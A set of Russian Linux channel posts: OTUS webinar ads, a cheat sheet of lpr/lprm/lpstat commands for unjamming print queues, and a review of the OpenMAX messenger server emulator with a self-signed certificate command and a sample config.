❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #SkillHunter@LinuxSkill #Linux #DevOps #Security #VPN #Networking #DPI

🎥 Вебинар по Observability: «Поиск и устранение проблем в системе мониторинга Zabbix» На вебинаре вы узнаете: - Типичные проблемы и антипаттерны в Zabbix, которые ломают мониторинг. - Как диагностировать ошибки конфигурации и находить узкие места. - Практики настройки Zabbix для стабильной и предсказуемой работы. - Как сделать мониторинг полезным инструментом, а не источником шума. Что вы получите: - Понимание архитектуры и принципов работы Zabbix. - Навык быстрого поиска и устранения проблем в системе мониторинга. - Практические подходы, которые помогут избежать типичных ошибок. 👉 Для участия зарегистрируйтесь: https://otus.pw/NUcS/ 🎁 Все участники вебинара получат специальные условия на полное обучение курса «Observability: мониторинг, логирование, трейсинг» На курсе от OTUS вы освоите инструменты, без которых не обходится ни один DevOps или системный администратор: Prometheus, Grafana, ELK, Tempo и другие. Вы научитесь выстраивать наблюдаемость под ключ — от сбора метрик до настройки алертов и визуализации данных. Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

🖨 Завис принтер на сервере? 14 команд Linux для управления печатью

Снова зависла очередь печати, а бухгалтерия требует документы? Хватит ковырять настройки в графическом интерфейсе или судорожно перезапускать службу. Держи консольную шпаргалку для базового управления принтерами прямо из терминала. 1. Отправка файлов на печать Эти команды позволят быстро распечатать нужный документ без открытия сторонних программ. # Печать файла напрямую в устройство $ cat [file] > /dev/lp # Отправить файл в очередь печати $ cat [file] | lpr # Форматировать файл (по 60 строк) и отправить на печать $ pr -l60 [file] | lpr # Распечатать файл на конкретном принтере $ lpr [printerName] [file] 2. Просмотр очереди печати Перед тем как отменять задачи, полезно взглянуть, что именно застряло. # Показать текущую очередь задач $ lpq 3. Отмена зависших задач Самый важный блок, когда нужно экстренно сбросить неудачную печать и успокоить пользователей. # Отменить текущую задачу печати $ lprm - # Удалить конкретную задачу по ее ID $ lprm [jobID] # Очистить всю очередь печати $ lprm -a all # Отменить все задачи на конкретном принтере $ cancel [printerName] # Отменить задачи конкретного пользователя $ cancel -u [user] 4. Статус и управление принтером Используй эти ключи, чтобы проверить состояние устройства или принудительно его включить/выключить. # Отобразить подробный статус всех принтеров $ lpstat -t # Включить принтер $ enable [name] # Отключить принтер $ disable [name] Теперь зависшие документы тебе не страшны. Сохрани этот пост под рукой, чтобы быстро решать проблемы с печатью.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #шпаргалка@LinuxSkill #Linux #Sysadmin #DevOps #Printing #CLI

🎥 Вебинар по Linux: «Платформенные драйвера. Как управлять периферией систем на кристалле (SoC)» На вебинаре вы узнаете: - Роль Device Tree в современных SoC: Почему на смену «платформенным данным» (platform_data) пришло дерево устройств и как оно описывает нестандартную периферию . - Как ядро анализирует бинарный blob (.dtb), преобразует его в дерево структур struct device_node и создает экземпляры platform_device . - Как осуществляется поиск правильного драйвера. Детальный разбор поля compatible в DTS и таблицы of_match_table в драйвере . - Практический пример: Написание каркаса собственного платформенного драйвера с нуля, включая обработку полученных из DTS ресурсов и взаимодействие с аппаратурой . 👉 Для участия зарегистрируйтесь: https://otus.pw/qiDs/ 🎁 Все участники вебинара получат специальные условия на полное обучение курса "Разработка ядра Linux" Курс «Разработка ядра Linux» — это практическое погружение в устройство ОС: процессы, память, модули, прерывания и всё, что делает Linux мощным и стабильным. Вы научитесь писать и отлаживать собственные модули ядра, работать с памятью, разбираться в синхронизации потоков и управлении прерываниями. Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

🆕 Прощай, слежка? Запускаем клон сервера MAX за 5 минут. Гайд для параноиков

Помните, мы разбирали, как мессенджер MAX сканирует сеть и наличие VPN? Энтузиасты провели реверс-инжиниринг протокола и выкатили полностью открытый бэкенд. Сегодня у нас на разборе проект OpenMAX - эмулятор сервера для мессенджеров MAX и TamTam. Разберем архитектуру, посмотрим в исходники и учимся разворачивать независимую инфраструктуру. Проект написан на Python 3.12+ с активным использованием асинхронности (asyncio). Разработчик под ником Alexey Polyakov проделал огромную работу по реверсу официального API (api.oneme.ru и api.tamtam.chat). Стек технологий выглядит привычно и надежно для любого сисадмина: - Сетевое взаимодействие строится на websockets и TCP. - Для упаковки и сжатия трафика применяются msgpack и lz4. - В качестве базы данных поддерживаются MySQL, MariaDB и легкий SQLite (через aiosqlite). Судя по дампу SQL-таблиц, сервер локально хранит профили пользователей, токены авторизации, чаты, контакты и сами сообщения в формате JSON-объектов. Интересная деталь: автор проекта жестко выступает против современных трендов вайбкодинга. В правилах проекта (CODE_OF_CONDUCT.md) прямо указано, что OpenMAX не принимает правки и Pull Requests, написанные с использованием искусственного интеллекта и нейросетей. Только ручной хардкор. Как переключить на свой сервер? Просто скачать официальное приложение из стора и вбить IP-адрес не выйдет. Сервер требует модификации клиента. У вас есть два пути: 1. Использовать пропатченный мобильный клиент MAX для Android или iOS (в репозитории есть раздел с инструкциями по патчингу IPA и APK). 2. Собрать открытый клиент Komet из исходного кода, жестко заменив адреса серверов на свои локальные. Развертывание и настройка Проект пока находится на ранней стадии и не рекомендуется для сурового продакшена, но для тестирования закрытого корпоративного контура подходит. Для старта серверу обязательно требуются SSL-сертификаты. Если у тебя нет валидных сертификатов от Let's Encrypt, можно сгенерировать самоподписанные прямо в терминале. # Генерация самоподписанного сертификата X.509 на 365 дней openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 365 Далее нужно настроить переменные окружения. Сервер слушает сразу несколько портов для совместимости с разными клиентами. # Пример минимальной конфигурации .env файла host = "0.0.0.0" oneme_tcp_port = "443" tamtam_tcp_port = "4433" oneme_ws_port = "81" tamtam_ws_port = "82" log_level = "debug" db_type = "sqlite" db_file = "openmax.db" certfile = "cert.pem" keyfile = "key.pem" Что делать, если хочется попробовать? Авторы сами предупреждают в README: проект находится на ранней стадии разработки, вероятно полон багов и категорически не рекомендован для профессиональной среды. На данный момент у сервера нет опубликованных релизов, стабильных версий и changelog-ов. Под капотом: - Весь код написан на Python и лежит в директории `src/`. - Реализован собственный TCP/WS-стек через модули `oneme_tcp`, `tamtam_tcp` и `tamtam_ws`. - Конфигурация задается через файл `.env` (шаблон доступен в `.env.example`). - Схема базы данных описана в файле `tables.sql`. Уже этого набора характеристик достаточно, чтобы понять: пускать этот код в контур, где критична безопасность, нельзя. Вердикт: используйте проект исключительно как локальную песочницу в закрытой сети с тестовыми данными. Если очень хочется развернуть сервер — прячьте его в изолированный контейнер без доступа к боевым базам и вашей основной внутренней сети.

❗️❗️❗️ Нравится формат? Ставь 👍 👉 Рубрика: #News@LinuxSkill #MAX #OpenSource #Python #Security #SelfHosted #ReverseEngineering